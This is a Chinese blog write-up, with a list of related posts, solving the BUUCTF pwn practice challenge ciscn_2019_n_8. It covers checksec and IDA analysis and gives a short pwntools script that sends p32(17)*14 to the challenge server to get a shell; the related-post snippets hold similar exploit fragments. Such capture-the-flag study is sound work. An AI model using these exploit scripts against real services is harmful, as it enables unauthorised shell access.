BUUCTF-PWN-ciscn_2019_n_8

最新推荐文章于 2025-02-20 15:35:52 发布

原创最新推荐文章于 2025-02-20 15:35:52 发布 · 311 阅读

0 ·

CC 4.0 BY-SA版权

CTF 同时被 2 个专栏收录

28 篇文章

订阅专栏

pwn

7 篇文章

订阅专栏

本文介绍了一种通过IDA逆向工程分析程序的方法，并提供了一个具体的案例，展示如何找到程序的漏洞并构造payload来获得shell权限。文章首先使用checksec检查程序的安全特性，然后在IDA中分析程序逻辑，最后编写Python脚本实现远程攻击。

部署运行你感兴趣的模型镜像

文章目录

查看文件信息

checksec 一下,保护还开的挺满 canary(栈保护)，nx(堆栈不可执行)，PIE(地址随机化)
在这里插入图片描述

IDA 分析

其实我们应该nc 连一下的查看远程程序运行情况
在这里插入图片描述
丢入 32位IDA分析一下

在这里插入图片描述
很显然程序的意思就是让 var[13] == 17就能拿到shell了

exp

from pwn import *
r = remote('node3.buuoj.cn',27168)
#r = process('./ciscn_2019_n_8')
payload = p32(17) * 14

r.sendline(payload)

r.interactive()

您可能感兴趣的与本文相关的镜像

Python3.10

Conda

Python

Python 是一种高级、解释型、通用的编程语言，以其简洁易读的语法而闻名，适用于广泛的应用，包括Web开发、数据分析、人工智能和自动化脚本

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Persistent_s

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【BUUCTF - PWN】ciscn_2019_n_8

古月浪子的博客

03-27

1246

checksec一下，好叭全开 IDA打开看看，var是int数组，如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...

buuctf pwn ciscn_2019_n_8

zip471642048的博客

06-21

427

checksec 看一下基本信息把程序拖到ida32分析一波，可以看到读入字符串给了 var 然后后面的v4，v5没起作用，然后判断了var[13]是不是等于\x11,是就给一个shell 所以只要让我们输入的字符后13位等于...

参与评论您还未登录，请先登录后发表或查看评论

ciscn_2019_n_8 详解

勿山几已

12-29

443

ciscn_2019_n_8 详解

[BUUCTF-pwn]——ciscn_2019_n_8

Y_peak的博客

02-10

3069

[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目上去checksec一下,吓一跳保护基本全开了。在IDA中一看，开心了。如此简单　只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +

Buuctf(pwn)ciscn_2019_n_8

半岛铁盒的博客

03-28

302

保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了

【BUUCTF-PWN】4-ciscn_2019_n_1

燕麦葡萄干的博客

07-04

705

这里为了堆栈平衡+1反而没办法打通，不+1反而可以成功，因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2，然后给v2 11.28125的值。查看变量在栈中的位置：v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位，开启了NX保护。这里再试验第二种思路，溢出到变量2。后门函数的地址是0x4006BE。

BUUCTF PWN wp--ciscn_2019_n_1

2302_81740139的博客

08-25

489

得到gets缓冲区的范围大小。用垃圾数据填充v1（如上图箭头为0x30+0x8），溢出v2，覆盖到下方的system函数，转换到cat/flag的地址0x4006BE。第二步进入主函数，发现func，main函数调用了func，func中存在经典gets()漏洞，我们看到本题是v2数组在做比较。第一步 checksec，并检查该题的保护机制。第三步编写脚本。

BUUCTF-Pwn-ciscn_2019_n_8

餐桌上的猫

02-15

341

题目截图检查文件信息，开了NX，Canary和PIE 反汇编查看主函数，只要var[13]=17就可以getshell，值得注意的是使用了(_QWORD *)进行类型转换，所以比较时读取的是QWORD即4个字的数据，也就是8个字节 exp from pwn import* r=remote('node4.buuoj.cn',28850) payload=p32(1)*13+p64(17) r.sendlineafter(b'\n', payload) r.interactive() #开启交互

buuctf--ciscn_2019_c_1

最新发布

2301_81060697的博客

02-20

863

获取libc库构造rop链

【BUUCTF-PWN】9-ciscn_2019_n_8

燕麦葡萄干的博客

07-05

461

4 + p32(17) #qword/IDA在32位里面是4个字节，在64位是/8个字节。不属于栈溢出，应该是比较简单的pwn，看懂代码逻辑+使用pwntools。32位，开启了Stack、NX、PIE保护。即当var数组的第十四个元素是17就可以。

BUUCTF ciscn_2019_n_8

、moddemod

06-11

539

exp from pwn import * context.log_level = 'debug' proc_name = './ciscn_2019_n_8' p = remote('node3.buuoj.cn', 26801) # p = process(proc_name) payload = 'a'.encode() * 13 * 4 + p64(17) p.sendline(payload) p.interactive()

[buuctf]ciscn_2019_n_8

逆向萌新的博客

06-19

580

[buuctf]ciscn_2019_n_8

BUUCTF pwn ciscn_2019_n_8

菜的只能随便写写博客

02-03

2759

0x01 文件分析文件很简单，32位，保护都开得差不多。 0x02 运行输入并且回显。 0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...

[BUUCTF] ciscn_2019_n_8

Lucien_Carr的博客

04-14

618

这道题非常简单（甚至比ret2text简单...），只需要满足让系统调用system函数的条件，即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件，只需要满足var[13] = 17就可以。前面有scanf函数，可以直接向var数组输入。开了canary、NX和PIE，似乎防得很严实。主函数里就调用了system函数，运气很好。32位程序，放到IDA中继续分析。攻击成功，运行结果如下。

BUUCTF pwn——ciscn_2019_n_8

CNS-Enterprise BCC-1701-J

03-15

241

BUUCTF 做题练习

buuctf——ciscn_2019_n_8

qq_41560595的博客

03-21

722

查看权限开了好多权限查看源代码分析观察，var数组是int类型，在内存中占了4个字节。输入一个字符串，令var[13]处的值是17，且这个值占4个字节，就能拿到shell。 var中每一个元素占4个字节，payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节，就要用p64打包。解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

buuctf之ciscn_2019_n_8

weixin_54452942的博客

04-12

863

两个方法解题

buuctf ciscn_2019_n_8

carol2358的博客

04-15

335

ida: 直接有sh，只要让var[13]等于17就可以 exp： from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...

BUUCTF PWN wp--ciscn_2019_n_8

2302_81740139的博客

09-03

964

第二步进入主函数，发现关键字眼/bin/sh，我们分析一下含bin的这部分代码。由于这里是var[13]=17LL,而var数组可以覆盖到了var[15]如图。为什么乘以14，因为，数组13是第14位（下表为零开始）第一步 checksec一下，本题为32位。